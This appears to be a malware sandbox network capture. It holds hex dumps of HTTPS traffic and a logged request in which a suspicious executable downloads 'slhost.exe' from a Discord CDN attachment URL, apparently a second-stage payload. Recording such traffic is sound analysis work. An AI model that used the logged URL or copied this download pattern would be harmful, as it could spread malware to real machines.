                                                                                                                                                                                2021-11-11 11:26:04 UTC2447INData Raw: 4d eb e7 fd 58 a8 2d 01 1a 25 b8 19 49 b4 c4 f2 4f 58 cc b9 48 75 00 a8 44 f6 76 15 2a 4d 02 42 a2 b6 4f 38 56 fc 80 c2 4e 90 10 6c 2b 81 bc 31 6a 24 f2 3c bf 00 80 57 e2 81 88 12 d9 19 d5 00 a1 02 f3 95 10 a1 1c 0e ab 26 46 bf 1b 77 1c 00 70 6b c2 98 c4 8c 89 d8 00 62 b6 8b 99 9a 3b f5 4e 75 78 05 e1 26 f9 f4 30 83 34 d5 80 62 46 fc 00 71 43 1f 4b af 7d 76 cf 79 0c 3b 59 29 9d 80 8a 4f c6 99 20 56 4f 03 a8 57 00 fa 3f 51 29 86 8d 34 1c 00 1e d5 d8 4d 59 2d a8 b9 00 64 83 4c 8b 50 bf 68 8e 00 0c 74 20 7d dc e6 41 e0 00 31 24 63 13 f4 15 eb 94 7c cc 0e 7f dd 64 d0 29 28 80 55 3d a5 37 25 58 fd e0 3a 6c 80 ec b1 01 b3 86 fa a8 90 ef 00 23 97 12 cb aa 08 e6 21 00 20 6b fd 24 0b 3b 35 83 01 1a ab 3e 34 72 f4 03 30 58 13 14 50 64 9d f5 00 31 49 48 a1 06 d8 d6
                                                                                                                                                                                Data Ascii: MX-%IOXHuDv*MBO8VNl+1j$<W&Fwpkb;Nux&04bFqCK}vy;Y)O VOW?Q)4MY-dLPht }A1$c|d)(U=7%X:l#! k$;5>4r0XPd1IH
                                                                                                                                                                                2021-11-11 11:26:04 UTC2463INData Raw: f7 dd 04 57 33 6f de cd 81 41 83 9e e8 00 4e 42 e9 12 0a 5e 2b e0 55 55 c0 18 66 5c 67 79 3d 1f 05 99 c4 c6 57 cc a0 24 24 36 0b ad 03 44 cf 43 4c 13 50 b0 19 a5 46 40 a7 6d 86 50 7c 0c 9f c0 fc 34 f7 37 68 9f d4 d0 c5 cd 19 04 75 2a 01 59 b1 eb 21 5b 71 f9 00 c9 62 0a 06 17 40 46 76 85 34 7a 80 48 53 78 7d e0 f6 02 7b 0d ce d4 ed 7f 41 70 48 cc d8 55 0f bd 83 29 fe 60 45 81 cd da 6c ed 70 a2 c5 0b e6 d8 e2 fa f5 82 5b 89 c3 5f 47 e4 6b da 0b 20 89 50 38 7f 49 bb f4 ca 89 e1 6c c3 96 ba 7c 50 4c ab d0 92 74 5f d3 3e 69 51 69 63 fd 23 02 1c 68 8d d5 16 5b 54 29 83 81 47 fe 6d a0 f6 19 a0 24 ff 2f b7 02 b2 05 db 17 e8 d6 e2 15 76 cc 48 3d bf 2c c1 e7 20 92 ed ec 05 ae 4a 7d f1 04 64 8c 6b 08 08 c7 39 09 3d 01 81 ee 1f c0 e0 2b 21 6a 3a d9 85 05 ed 53 c4 d0
                                                                                                                                                                                Data Ascii: W3oANB^+UUf\gy=W$$6DCLPF@mP|47hu*Y![qb@Fv4zHSx}{ApHU)`Elp[_Gk P8Il|PLt_>iQic#h[T)Gm$/vH=, J}dk9=+!j:S
                                                                                                                                                                                2021-11-11 11:26:04 UTC2479INData Raw: 2a 82 a5 f8 05 b0 af 49 56 04 e2 45 55 f4 16 f6 27 e9 df dc 89 22 6d 06 20 34 f7 77 59 a8 09 96 a4 f4 3f 75 91 69 91 fd d1 cc 35 34 12 46 88 4d bf 16 fe fd 64 12 be a8 f0 44 80 00 d6 47 fc 9b 7f dc 09 a1 76 53 00 01 c6 ce 1f 9d 75 c2 44 00 45 d5 96 2e ac a6 7c 69 00 0d 4e a5 85 6d be 83 6c 03 43 49 81 f3 cb ea 4a e8 f8 08 b4 f8 7d a4 fb 8e ee 02 d3 56 f2 ff 50 dd ed cc cc 37 e9 2d 7c ba c6 28 9f 71 40 95 58 cd 4a cb de 17 49 ab a7 d1 01 57 bf 16 dd 09 7b 3e bf 64 a0 0b 38 a8 57 05 04 14 eb a6 b6 11 16 4a 03 cb 52 90 40 ff 8c 02 0b 18 5b 20 5c f1 91 10 7f f7 2f 7b 1d 22 d4 a6 1f 80 18 37 01 b2 8e 06 68 3e 9b 2e 12 dd 1e 54 5f 56 c0 d8 72 7e 7f 5e c1 00 ee 03 81 e6 d9 49 fe 55 c7 0c c5 6d c7 3b c0 c6 c3 b7 11 fb 78 60 4b a9 2a c4 4f a5 00 62 21 5d d3 3b 0b
                                                                                                                                                                                Data Ascii: *IVEU'"m 4wY?ui54FMdDGvSuDE.|iNmlCIJ}VP7-|(q@XJIW{>d8WJR@[ \/{"7h>.T_Vr~^IUm;x`K*Ob!];
                                                                                                                                                                                2021-11-11 11:26:04 UTC2495INData Raw: ff 4f ee a7 51 82 c7 56 df 52 ea ca cc c6 e9 5e 0b 01 51 56 68 1f 1e 48 2c ee f5 7b a3 ad d2 55 13 af 0a cc ee c4 02 ae 2e cb 6b 95 fc 54 5c bf 48 e1 50 68 09 10 2d 25 1b 5e 1c 53 c9 e9 29 04 ae 20 f5 5b 83 44 4e 05 b2 13 d7 ae 8f 86 d6 ab 2e 00 4e a2 77 e6 a1 0a 28 b7 95 64 61 88 ee fe 3a 8e 98 6c fd c0 ae 47 0e 6a b2 e6 f1 00 1a 99 a4 4b 9e 0a bd dd 03 e4 4a 80 14 fb d3 f8 7b 75 10 1e 71 45 89 c0 9f ef 30 0a 6d 2c f2 88 00 c0 54 13 40 a2 7d 11 0c 00 e9 d7 59 77 f3 3f eb 65 3e e3 99 80 f9 0a e1 03 7f 0d 5a 05 9c 6f a3 44 2d 87 36 e0 39 f8 71 b9 00 ec a0 73 04 63 11 2c 42 07 49 26 ef 65 13 40 1b 5a 30 50 00 38 14 b7 59 34 c7 b3 1c ec 12 00 c4 a3 d3 a9 fc 21 26 2b 00 95 45 a4 6e 85 08 5e 8b 03 c4 9f 3d c9 e6 4d a0 d2 ec 0b 00 9c 91 2f 74 b6 12 8d c0 1d 44
                                                                                                                                                                                Data Ascii: OQVR^QVhH,{U.kT\HPh-%^S) [DN.Nw(da:lGjKJ{uqE0m,T@}Yw?e>ZoD-69qsc,BI&e@Z0P8Y4!&+En^=M/tD
                                                                                                                                                                                2021-11-11 11:26:04 UTC2511INData Raw: 5e 26 d3 5c ca 00 46 6f dd 42 23 54 ae 39 24 d5 62 6a 00 69 b0 38 88 09 60 00 77 90 68 c9 ad ce e1 a5 00 a9 a8 94 1b 9f d8 47 0a 00 3d a7 cf be e3 75 12 28 00 c6 2a e9 2d ab a9 9a 57 00 91 20 61 df 37 d6 13 58 00 89 a7 4b fc e1 63 d5 b7 1c bd 86 60 84 e3 d2 a5 c1 1a ee 45 e4 1b 28 00 3f 07 02 79 16 78 93 66 00 f8 bc 62 e2 98 57 f0 ed 16 b6 26 58 00 9f 91 17 b7 5d b9 02 87 f1 af 77 e5 be 77 00 23 29 01 0f 3d 03 d5 1b d6 94 51 4d 88 b3 58 e3 00 a6 32 c2 1f 54 10 2f 46 00 ad 6c 0a 9d f5 25 5d 3b 00 b2 b7 f8 12 31 ce de 3c 01 92 79 85 26 98 f1 19 30 ef 28 00 64 f2 77 47 53 b7 35 1b 00 51 a0 59 a3 c8 79 0a 2d 38 ad f7 80 1a 01 7a 91 93 55 aa 00 5d 15 2c 9e 37 4f 95 41 00 27 0a a3 e9 3f c5 b5 0d 0e d6 bf 83 52 84 9b 36 80 c1 aa 27 bb 00 c4 a0 6a a3 de 4d f7 62
                                                                                                                                                                                Data Ascii: ^&\FoB#T9$bji8`whG=u(*-W a7XKc`E(?yxfbW&X]ww#)=QMX2T/Fl%];1<y&0(dwGS5QYy-8zU],7OA'?R6'jMb
                                                                                                                                                                                2021-11-11 11:26:04 UTC2527INData Raw: 4c 56 ec 1d 1c cc 7e 9d 17 42 80 e3 5e d8 f5 d5 06 00 6a b7 c7 fd dd e6 5d 7c fe dc 00 7d 7f bf f2 80 40 0e b7 79 63 00 9a 29 a4 d5 cd ea 52 30 00 81 8d 04 c9 87 de 74 94 26 6a 17 39 00 a2 31 43 3a 69 85 00 d7 7a 66 a9 87 63 c4 91 00 b6 0b 58 75 26 5f 0c 71 00 88 b9 16 80 c3 bd 7b 95 00 a3 85 b2 75 2f f9 a8 6d ee 7f 00 30 6e 63 ee ad 13 d1 97 00 79 d5 c7 1c 59 26 17 89 1e aa 45 e6 80 f4 f0 2c 34 15 33 00 46 bf a8 23 48 8f 87 68 00 d9 e2 7c 12 2b 37 26 b8 02 e6 a9 c4 24 f1 74 e0 50 43 6b 0e 96 75 18 9d c0 e5 58 0c 7b f5 0f b7 2d d8 52 87 99 6a cb 5c 40 03 c9 2e 22 6f e0 4d 7f 56 58 47 17 07 69 93 3e 60 30 7e 2d 3a 14 00 66 2a 1a 56 a0 51 b4 76 3e a6 29 03 7b f7 f4 96 78 b0 b0 92 4a 00 4c 68 5b 06 63 b9 5f c0 e6 d4 00 ad 1b 80 5e fd 96 4c b4 00 aa b7 71 07
                                                                                                                                                                                Data Ascii: LV~B^j]|}@yc)R0t&j91C:izfcXu&_q{u/m0ncyY&E,43F#Hh|+7&$tPCkuX{-Rj\@."oMVXGi>`0~-:f*VQv>){xJLh[c_^Lq
                                                                                                                                                                                2021-11-11 11:26:04 UTC2543INData Raw: 67 b2 19 63 3a 70 f0 8d 00 8c a9 1e f2 31 e1 e0 0a 00 14 99 71 3b 0f b4 79 3a 2e fd 9f bf 3a 00 2c 83 b1 b3 27 32 41 00 90 99 74 4e 8d 81 a6 68 00 bf 2a 12 3d d4 6d 28 2f 00 70 3e 36 98 9c 37 e7 06 02 59 e1 bc 58 a2 3c ff 40 23 b6 19 00 7f 21 d7 0b 96 9c 31 6e ee c2 00 61 cb cd 7c 25 7d e5 32 00 2a 8d 92 8b ea 7a c3 c0 1e c5 aa b5 80 93 d5 6d 44 9b 17 00 2d 9d 1b 80 47 b2 4e c4 00 45 85 bd c6 99 b8 58 bf 00 92 e5 c2 a9 a6 28 8e 6e 3d f3 d0 3d 95 00 1a e0 dc 1c f1 9b af 0f 4a 87 78 be 80 5a 8d fb 66 4d 3e 4f ea 7a 00 25 d0 0c b2 3d 07 bd 60 00 ef 40 f2 15 fd 76 47 52 00 4e 9f 70 b2 09 6b ad 44 50 72 da 27 3e c9 60 80 0a 5c aa ca 50 51 5d 01 f2 96 84 0c b5 93 7f f8 8d 03 00 fb 0b c6 3b a3 50 ef f9 09 cb 6b 90 18 87 0b 65 d1 70 60 99 c8 9b 52 00 5f 1e a1 12
                                                                                                                                                                                Data Ascii: gc:p1q;y:.:,'2AtNh*=m(/p>67YX<@#!1na|%}2*zmD-GNEX(n==JxZfM>Oz%=`@vGRNpkDPr'>`\PQ];Pkep`R_
                                                                                                                                                                                2021-11-11 11:26:04 UTC2559INData Raw: 0d 10 6e f4 23 0e 6b c2 d8 a3 29 9f 8c 1e de 28 00 b4 f1 01 43 bc eb ab b2 03 c6 be 26 4f 9f 44 df 50 73 39 3e 2e 1e f3 ee 8c 83 b3 7c 66 29 b0 5f f4 8b 00 4d dd d3 e2 a3 77 e7 2d 00 cd 6c 0c 31 89 71 99 3c f6 6a 3e 56 5c 80 48 2a 7b 25 c3 91 d2 00 cb e1 dc 1a c8 a4 2c 7d 00 ea 3b 4f e4 90 3c bd 77 00 b3 58 99 3e 26 d1 ae 61 00 cc 9b 3b f4 16 42 f6 7a 26 c2 31 a2 1e e9 00 03 a8 bc 68 d2 2e 00 cd 08 14 5e 01 ce 75 65 00 49 b6 2c 96 d7 28 10 0d 00 85 26 d8 b7 86 eb 78 fd 01 02 80 f9 2c 01 da e5 c8 06 bf 07 96 31 d1 7e 65 a9 00 6a d3 8d 77 4c 00 2a 52 a4 09 c1 25 0c 42 f0 81 00 61 59 fc 2f 08 e7 ee d9 0f 93 c2 f4 83 e0 50 99 9e 79 28 c0 18 ad 48 af 97 87 00 2f fd d7 24 2b b1 72 e7 03 99 c2 18 bf 42 53 f8 de d2 a8 00 06 df 36 5c 48 8b 6a 16 00 1c 2d 9e 73 54
                                                                                                                                                                                Data Ascii: n#k)(C&ODPs9>.|f)_Mw-l1q<j>V\H*{%,};O<wX>&a;Bz&1h.^ueI,(&x,1~ejwL*R%BaY/Py(H/$+rBS6\Hj-sT
                                                                                                                                                                                2021-11-11 11:26:04 UTC2575INData Raw: ce 63 86 74 c4 00 5b 53 44 90 75 c8 99 4d 00 42 fb 4a 7d 85 1b f7 f4 00 3f c6 38 95 f1 cb 8e 3b 0f 92 b0 5f 98 40 58 8c e9 52 c4 00 10 d4 bc d8 6c 5d 4f a2 00 34 5e e5 8d 20 98 d1 ed 00 60 f4 77 f0 b4 75 1a 32 18 87 8c 9f de 59 a1 00 6f e3 d0 ad 3b 4a a9 3c 00 fc c0 45 b1 ab d8 7f f1 00 43 81 78 97 51 4e 6f f3 00 63 0e 7e ce 6b 9b 56 55 1c aa b4 4c 40 fa 28 57 c7 91 50 3e b5 33 1f 3c c1 df e0 40 d2 a7 04 1f 59 70 00 79 b6 d0 2b 47 95 12 a0 00 16 06 01 46 52 9d 54 ab 7e 93 00 ec 34 58 fc 47 0b 56 c6 00 7e cd 5d 2f 10 74 8a 21 2c db 0a 69 00 6d d2 0d fb 7c 05 00 41 b1 4e 2e a7 cf 06 e0 77 8c fe 5e 00 5a 28 31 4a ee 9a de 35 00 88 70 f2 d4 5c 8d b5 9e 3f f5 8a 80 23 af e0 92 dc 26 72 00 83 b6 70 e8 0e 7d 18 75 0e 35 11 c0 a5 bc c0 3e 47 ed 02 aa 8c fc 81 38
                                                                                                                                                                                Data Ascii: ct[SDuMBJ}?8;_@XRl]O4^ `wu2Yo;J<ECxQNoc~kVUL@(WP>3<@Ypy+GFRT~4XGV~]/t!,im|AN.w^Z(1J5p\?#&rp}u5>G8
                                                                                                                                                                                2021-11-11 11:26:04 UTC2591INData Raw: b7 00 6b 50 92 65 2f fd f3 03 91 aa e9 8d 7b 6c e3 37 c8 9d 19 cd b8 e7 f1 d0 2f c3 30 3b e3 f2 6a 03 d9 00 9d 78 88 1d 94 1e 79 80 ea 4f 58 61 76 00 0e 5d 4a 59 d7 22 b9 00 17 3f d4 3e 1a 1c e9 da f0 4b 0f 34 30 a2 8c c0 1d c7 67 53 9a 00 e7 43 37 cd 73 df 2c 8b 00 79 6c 84 aa 2d ae 17 e9 05 29 47 83 6f 3e c1 23 bd 60 60 6e ab 0b d8 4a d4 a3 00 09 7a ef 61 bc 07 a2 46 76 20 e9 70 81 8a 2d 8e 00 4c 6b 42 09 59 07 fc 62 1d 3f a0 70 80 e0 0c 6f 3a c7 53 01 31 8f 66 dd b2 f2 4b 40 ee 95 8e 0f 00 26 da db 50 1f 9e 87 78 00 27 0c c3 20 2c 48 62 1a 24 2a 33 c6 1f 66 03 8f 9e 14 79 c1 9c ad e0 85 a4 00 4c 3b 0b cd 9d 60 84 a8 00 67 68 bc bf df 42 14 2d 00 49 3b e9 79 99 7e 87 56 07 71 72 68 7c cb 20 df 3c dd b0 00 eb d8 41 3f 3e 2a 46 13 00 83 a0 db e2 ed 64 0c
                                                                                                                                                                                Data Ascii: kPe/{l7/0;jxyOXav]JY"?>K40gSC7s,yl-)Go>#``nJzaFv p-LkBYb?po:S1fK@&Px' ,Hb$*3fyL;`ghB-I;y~Vqrh| <A?>*Fd
                                                                                                                                                                                2021-11-11 11:26:04 UTC2607INData Raw: 4e f2 7b 02 02 c1 e2 7c d0 11 38 e0 c8 c8 56 03 e6 01 c9 9f d5 68 8d c0 58 09 05 a8 00 e3 8a c7 de 8c 63 ed 07 26 3d df 24 0f 26 11 80 c9 64 9b b9 fb 3c 2b a5 1e cd 3d 06 6c fc d5 ce 80 a5 c0 69 00 34 d2 92 e3 03 67 7a 07 01 8b eb f3 ba 6c 56 15 f2 c0 40 bb d2 00 b5 ee cb b6 65 be 42 07 00 89 2e cf 3f 9a e0 ec e8 07 1f 66 92 a2 0a 70 52 aa 6c 95 00 91 9b 2f 11 3a 7c 27 6e 00 73 d6 06 17 57 5f 86 09 75 ed 0e d4 91 5c 98 c0 70 3e 37 8e 21 74 89 00 34 5f f3 f9 a1 a3 da 08 07 63 fd 50 cd d1 80 f2 33 7f 35 00 21 79 3f d5 10 a7 ae af 16 ec 9c ba 00 28 b7 d3 4e bf 86 00 56 70 21 69 ae 3b 94 52 26 f0 49 13 0f 6c af fe c7 81 ab 5b 03 b6 e2 e0 8b aa d9 00 3f 4a a2 3a cc 9f eb 03 00 e5 55 78 6c b8 ee c4 2d 00 17 df c1 8e af b2 20 9f 00 13 bd 4d f9 04 11 fd 65 07 dd
                                                                                                                                                                                Data Ascii: N{|8VhXc&=$&d<+=li4gzlV@eB.?fpRl/:|'nsW_u\p>7!t4_cP35!y?(NVp!i;R&Il[?J:Uxl- Me
                                                                                                                                                                                2021-11-11 11:26:04 UTC2623INData Raw: 3a 24 e8 a1 a3 00 83 81 01 ca 52 60 37 55 71 7b 39 f8 d0 00 4d a7 a4 07 cc 3c cb 00 31 ed 75 a5 24 dc 52 3a 48 56 ef 3c a2 8f b8 e9 c3 40 bd 08 a8 7f 90 00 0b 68 c4 3e 3b 17 ea ee 00 de 76 b9 93 eb 0f 95 9b 01 1e 4f 59 d3 b8 dd 34 c0 8b 61 00 b3 e8 18 0c e4 63 5c 7b 00 c4 ce f7 f1 29 69 6b ee 00 70 82 51 be a1 23 ba 31 01 0e 84 8c b6 61 3d 89 f0 2e 60 0e c1 de 19 5b a0 d0 54 e6 a6 35 3a 1d 72 0c 5c 2d 10 f8 4b 00 fd 59 c2 14 37 a8 99 06 2e e4 3e 79 0f 8d 09 80 7f d1 36 49 1b 00 33 31 8a 0c 78 eb 3d 8e 07 9d fc a0 d5 b6 63 ef cf 80 90 87 4e 0b fa 13 e6 a1 00 f5 64 75 88 79 00 dd 40 5e 1a c0 f4 df 70 39 8f 37 00 b5 3f 66 4d 0b d7 50 00 83 a2 57 25 12 88 ba 61 00 2b 95 94 a5 3c 5e 8c 4a 01 8b eb 53 0b 64 05 bb c1 91 40 d6 3f 09 32 00 1f 80 1c 89 16 63 10 4f
                                                                                                                                                                                Data Ascii: :$R`7Uq{9M<1u$R:HV<@h>;vOY4ac\{)ikpQ#1a=.`[T5:r\-KY7.>y6I31x=cNduy@^p97?fMPW%a+<^JSd@?2cO
                                                                                                                                                                                2021-11-11 11:26:04 UTC2639INData Raw: 95 b9 8d 4b ea 1f d3 21 f1 82 bb 07 3c f6 40 07 d6 48 12 9a 47 23 0b 02 79 87 71 fe d0 e5 39 da cc 01 34 fd e0 50 dc 63 de 60 13 95 7f 12 00 2c 93 f0 cf 13 70 49 30 03 4d 94 32 d1 e1 a2 a0 7d fc f6 07 95 8c a9 4f 11 d0 57 ad 4a a1 00 0d 5d c9 2d e0 d5 87 05 12 82 fc ab 00 b3 89 ba 43 9a 44 00 3c 2b 4a a6 33 dc 25 a7 e2 11 0e 8a c6 93 75 40 cd 91 23 98 a2 00 bd 45 f9 f3 96 7c be 2d 00 b3 0b 22 03 8a 21 69 47 7f 26 03 60 a4 87 b7 3b 80 b0 e5 eb 2e 00 9b 5d e8 ba 59 cc 7c 94 67 a8 60 ae 80 de df e1 5f 4c ee f2 00 a4 13 24 4c a0 63 98 2e 9f 68 4e 00 d5 bd d1 a2 5f e9 b8 83 0f 6c b9 1d 1a a1 07 e1 29 0b d0 fe eb 00 5c b3 f7 95 5e a0 7f 48 3f f5 e9 00 e0 8a ba 18 14 10 e5 00 d3 b0 c7 bc 38 22 e7 64 07 ca d8 6f 47 94 40 14 f2 a0 67 72 3d 00 11 02 e6 86 5f 58 60
                                                                                                                                                                                Data Ascii: K!<@HG#yq94Pc`,pI0M2}OWJ]-CD<+J3%u@#E|-"!iG&`;.]Y|g`_L$Lc.hN_l)\^H?8"doG@gr=_X`
                                                                                                                                                                                2021-11-11 11:26:04 UTC2655INData Raw: 89 81 12 8b 24 a2 48 ac 91 d7 22 e1 45 eb f9 5a 02 0c 24 37 48 41 91 4b 22 62 44 6c 97 89 a1 12 ab 24 c2 48 cc 91 f7 10 01 5b 22 0b 44 22 2c 89 57 12 61 24 6b 48 82 91 8c 22 b7 44 c1 cb 89 e2 12 ec 22 17 5c 04 21 48 2b 91 42 22 4c 44 77 81 89 8b 12 a2 24 ac 48 d7 91 e1 22 eb fc 5d 81 0c 12 37 24 41 48 4b 91 62 22 6c 44 97 a1 89 ab 12 c2 24 cc 48 f7 88 01 5e 11 0b 22 22 44 2c 57 89 61 12 6b 24 82 48 8c 91 b7 22 c1 44 cb e2 89 ec 11 17 5f 02 21 24 2b 48 42 91 4c 22 77 44 81 8b 89 a2 12 ac 24 d7 48 e1 91 eb 7e 40 60 0c 89 37 12 41 24 4b 48 62 91 6c 22 97 44 a1 ab 89 c2 12 cc 24 f7 44 01 61 08 0b 91 22 22 2c 45 57 fe 24 6b 48 82 91 8c 22 b7 44 c1 cb 89 e2 12 ec 22 17 62 04 21 48 2b 91 42 22 4c 44 77 81 89 8b 12 a2 24 ac 48 d7 91 e1 22 eb fc 63 81 0c 12 37 24
                                                                                                                                                                                Data Ascii: $H"EZ$7HAK"bDl$H["D",Wa$kH"D"\!H+B"LDw$H"]7$AHKb"lD$H^""D,Wak$H"D_!$+HBL"wD$H~@`7A$KHbl"D$Da"",EW$kH"D"b!H+B"LDw$H"c7$
                                                                                                                                                                                2021-11-11 11:26:04 UTC2671INData Raw: 82 56 93 8a 58 61 35 e8 73 b5 00 de 5f 17 28 33 92 36 d9 00 3e b7 3a 65 4d b4 2c f0 24 44 a9 1b 07 c1 0f bd 80 62 35 6b 13 fe 50 00 72 6e 2b da a1 70 3b 9c 00 89 41 a8 5e 98 c1 8b 08 01 40 1c aa 52 b0 cb 4b 60 de 17 00 21 f0 db 79 c5 6b 35 0f 01 5c 33 95 f5 e8 d3 ef d0 51 f1 30 e9 26 88 14 da 8c 00 48 50 a7 08 20 8f 7b c4 00 23 12 6a ca e3 71 6f b1 3d 1f 01 80 07 d8 36 f7 4f f5 62 00 0f e8 87 40 1e ea 3d f2 00 08 e9 32 a4 b5 89 98 79 00 fc c3 c6 dd dc 23 ab 26 3a 42 2c 80 de 1a 49 80 9d 95 83 7e 4d 90 20 00 3a 9c 38 df 44 34 d5 6a 1f 31 f9 f1 81 72 19 7b 96 24 20 69 93 1c 40 a8 d7 01 76 fb 55 d6 e9 fc 79 41 00 71 a6 74 94 aa 42 44 6b 00 f5 a3 8c 87 36 46 9c ad 07 2c 1d 64 b8 f2 b0 4e 8d 13 e4 00 0e 3a 23 f7 f0 c4 1c 9d 00 e0 b5 ec 94 38 d1 83 d4 00 11 7f
                                                                                                                                                                                Data Ascii: VXa5s_(36>:eM,$Db5kPrn+p;A^@RK`!yk5\3Q0&HP {#jqo=6Ob@=2y#&:B,I~M :8D4j1r{$ i@vUyAqtBDk6F,dN:#8
                                                                                                                                                                                2021-11-11 11:26:04 UTC2687INData Raw: 6e 5e 00 04 88 89 f0 9a c3 af cd 00 e0 52 d2 53 66 e6 2e 08 00 c5 32 5b 4e e9 73 9a 0e 00 56 84 e1 d5 68 a5 24 d9 00 7b 8b 1c 52 af 2c f3 f0 ed c9 59 f0 0e ec 05 56 e0 c3 d5 80 80 20 48 37 ab 09 c8 4f 21 7d 81 7a da ac fb 70 bb 2d 00 82 7a e8 b6 77 04 4e 81 00 76 6c 09 fa 9f b0 68 d8 02 5d d2 99 84 46 34 60 b7 72 67 00 ef e9 3c 39 47 21 2a 6b 00 1e 13 bd 80 3b 63 75 ae 1c b3 c1 45 80 f1 f0 9f b7 4c 90 00 52 27 cd 3e fa d2 f2 7a 00 25 3c 11 5b f3 9a 2f e3 00 31 e8 68 54 dc 32 9e 12 3b f0 25 80 9d 58 ca 2d aa 41 3d 07 47 3e ee b2 fa 00 b3 b1 d8 46 00 6a 23 74 06 b5 e4 b4 ae 00 7b b6 58 d0 a4 19 79 5d 3e 80 69 80 04 33 1e df cf 5c f0 00 14 b7 4f a7 cb cd 92 72 00 fa 94 62 34 fe 03 36 5f 06 d8 08 19 0a 91 66 00 cc 52 f7 f6 14 b0 6d 77 1d db cf bf 80 b5 94 4a
                                                                                                                                                                                Data Ascii: n^RSf.2[NsVh${R,YV H7O!}zp-zwNvlh]F4`rg<9G!*k;cuELR'>z%<[/1hT2;%X-A=G>Fj#t{Xy]>i3\Orb46_fRmwJ
                                                                                                                                                                                2021-11-11 11:26:04 UTC2703INData Raw: 6e b6 9a 6a 00 d6 b7 40 e3 03 d2 2d 17 75 48 00 8e 96 36 29 0d 82 42 d9 07 41 12 6e 22 b5 80 31 4a fc 2d 78 74 00 aa 43 3d 06 b4 8c d7 42 fa 94 38 80 2a ba 03 03 19 c8 22 36 02 d0 91 17 26 00 ca e7 f5 a8 bb 69 49 0d 01 4f c6 09 aa 70 6b cf 60 00 bf 00 bc 02 6d 0a a0 1e 9f af 01 8e e3 04 a1 a9 f3 9e 30 09 ad 00 dc c5 ab 44 63 9f 80 e6 00 fc 2c bd cc f5 f9 cd 6a 00 da 98 92 4a 8b b8 b2 aa 01 8c 1f e1 7d 5b 10 99 e4 7e fe 07 2a 9f 75 93 d5 40 73 b8 47 68 07 6b f8 5b 36 c2 70 1d bb f9 09 00 c6 d3 35 c4 6c f5 30 31 07 95 7f 81 23 1d 37 66 30 e4 ca 7c 27 03 bd 4a b8 48 d6 f7 99 47 b7 30 08 13 1f d7 2a 23 00 02 d9 52 e7 a9 ac f4 8f 03 cd 34 f1 0f 27 7b e0 33 fb 87 00 a4 b8 58 e6 6e e0 cd 91 e6 f3 04 12 88 95 3e 18 80 f9 8f b0 22 00 78 6a 62 ee 19 f3 45 9e 00 6e
                                                                                                                                                                                Data Ascii: nj@-uH6)BAn"1J-xtC=B8*"6&iIOpk`m0Dc,jJ}[~*u@sGhk[6p5l01#7f0|'JHG0*#R4'{3Xn>"xjbEn


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.2.549770162.159.129.233443C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:10 UTC2713OUTGET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1
                                                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:10 UTC2713INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:10 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 3731093
                                                                                                                                                                                Connection: close
                                                                                                                                                                                CF-Ray: 6ac72a046c4016ea-FRA
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Age: 52166
                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                Content-Disposition: attachment;%20filename=slhost.exe
                                                                                                                                                                                ETag: "7663a0f9957107e7ef91c493a3c85261"
                                                                                                                                                                                Expires: Fri, 11 Nov 2022 11:26:10 GMT
                                                                                                                                                                                Last-Modified: Wed, 10 Nov 2021 20:55:52 GMT
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                x-goog-generation: 1636577752746880
                                                                                                                                                                                x-goog-hash: crc32c=m0CsxQ==
                                                                                                                                                                                x-goog-hash: md5=dmOg+ZVxB+fvkcSTo8hSYQ==
                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                x-goog-stored-content-length: 3731093
                                                                                                                                                                                X-GUploader-UploadID: ADPycdtzHVvlw5XVUMDFxEdqMLofS1RRB2tAZVtKwS9snozqeFJGOKJuI78Yfpod3_GhOWWub_2KkeaGUv4a00WlL1k
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                2021-11-11 11:26:10 UTC2714INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 75 48 51 5a 44 4d 35 53 53 49 35 67 67 52 53 33 79 66 25 32 42 4b 32 49 6e 74 49 47 76 59 79 71 4e 43 46 71 66 37 45 6f 30 50 36 36 31 64 77 55 45 78 41 52 31 68 34 57 33 79 78 51 53 6e 44 6f 53 43 49 74 49 61 31 65 63 41 35 46 73 42 52 65 42 7a 77 5a 6c 79 55 78 46 33 44 79 47 54 54 42 69 42 5a 70 52 4f 66 78 53 4b 79 62 56 49 72 57 67 32 66 69 59 34 59 78 56 4c 39 49 55 72 65 68 35 57 74 50 51 79 74 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
